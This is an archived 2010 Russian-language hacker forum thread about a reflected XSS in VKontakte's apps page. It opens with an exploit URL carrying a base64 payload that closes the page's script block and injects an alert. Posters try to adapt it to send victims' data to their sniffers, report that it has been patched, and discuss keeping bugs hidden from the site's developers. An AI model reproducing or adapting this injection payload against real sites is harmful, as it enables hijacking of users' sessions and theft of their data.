Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

пассивная xss вконтакте

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> пассивная xss вконтакте
Имя
Сообщение << Старые топики   Новые топики >>
пассивная xss вконтакте - 2010-05-16 10:42:18.760000   
yMa.hacKer

Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
http://vkontakte.ru/apps.php?act=new_policy&to=Jzt9KTsNCn0NCjwvc2NyaXB0Pg0KPHNjcmlwdD4NCmFsZXJ0KCd4c3MnKTsNCjwvc2NyaXB0Pg
Post #: 1
RE: пассивная xss вконтакте - 2010-05-16 11:56:14.160000   
Deamon.32

Сообщений: 667
Оценки: 0
Присоединился: 2010-01-03 23:15:57.100000
У меня сейчас нет сниффера под рукой, бага работает??
Post #: 2
RE: пассивная xss вконтакте - 2010-05-16 12:04:51.173333   
yMa.hacKer

Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
работает)
вот эта часть в ссылке
Jzt9KTsNCn0NCjwvc2NyaXB0Pg0KPHNjcmlwdD4NCmFsZXJ0KCd4c3MnKTsNCjwvc2NyaXB0Pg это просто зашифрованный скрипт в BASE64
';}); } &lt;/script&gt; &lt;script&gt; alert('xss'); &lt;/script&gt;
Post #: 3
RE: пассивная xss вконтакте - 2010-05-16 14:22:33.493333   
Deamon.32

Сообщений: 667
Оценки: 0
Присоединился: 2010-01-03 23:15:57.100000
Да я вижу работает, вот только как в него свой скрипт вставить - сколько не пытаюсь на сниффер ничего не приходит(
Post #: 4
RE: пассивная xss вконтакте - 2010-05-16 14:31:25.846666   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Гмм то-ли прикрыли то-ли у меня не пашет…
Post #: 5
RE: пассивная xss вконтакте - 2010-05-16 14:37:19.590000   
yMa.hacKer

Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
да походу, минуту назад работало, уже нет
Post #: 6
RE: пассивная xss вконтакте - 2010-05-16 14:48:42.296666   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Дуров жжет ))
Post #: 7
RE: пассивная xss вконтакте - 2010-05-16 16:08:41.656666   
Enter haker

Сообщений: 32
Оценки: 0
Присоединился: 2010-02-27 21:29:25.176666
Все закрыли. едлайте выводы стоит ли выкладывать дето то что так долго искал!
Post #: 8
RE: пассивная xss вконтакте - 2010-05-16 16:10:35.443333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
то есть, то нет… не пойму…
Post #: 9
RE: пассивная xss вконтакте - 2010-05-16 16:13:03.013333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000

quote:

ORIGINAL: Enter haker

Все закрыли. едлайте выводы стоит ли выкладывать дето то что так долго искал!


не верная формулировка… если и выкладывать то хотяю ссылку в хайде не говорю уже про название топик… которое в гугле как маяк светится…
Post #: 10
RE: пассивная xss вконтакте - 2010-05-16 16:27:20.696666   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
Гмм интересно есть ли баги вконтакта которые найдены но в паблик не выкладывались….
Post #: 11
RE: пассивная xss вконтакте - 2010-05-16 18:51:30.073333   
Deamon.32

Сообщений: 667
Оценки: 0
Присоединился: 2010-01-03 23:15:57.100000
Да надо аккуратней с инфой, если выкладывать то под хайдом в 100постов а еще лучше рассылать по лс тем кто в топе отпишет
Post #: 12
RE: пассивная xss вконтакте - 2010-05-16 18:59:21.200000   
Sрam

Сообщений: 2863
Оценки: 372
Присоединился: 2009-01-16 15:23:43.276666
А ты думаешь Дуров на ксакепе ака не имеет?
PS наивный…
PPS Они среди нас…
Post #: 13
RE: пассивная xss вконтакте - 2010-05-16 19:04:06.790000   
Deamon.32

Сообщений: 667
Оценки: 0
Присоединился: 2010-01-03 23:15:57.100000
quote:

А ты думаешь Дуров на ксакепе ака не имеет?

:D:D:D:D:D хахаха, ты еще скажи что вот это его акк :D
Post #: 14
Страниц:  [1]
Все форумы >> [Уязвимости] >> пассивная xss вконтакте







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.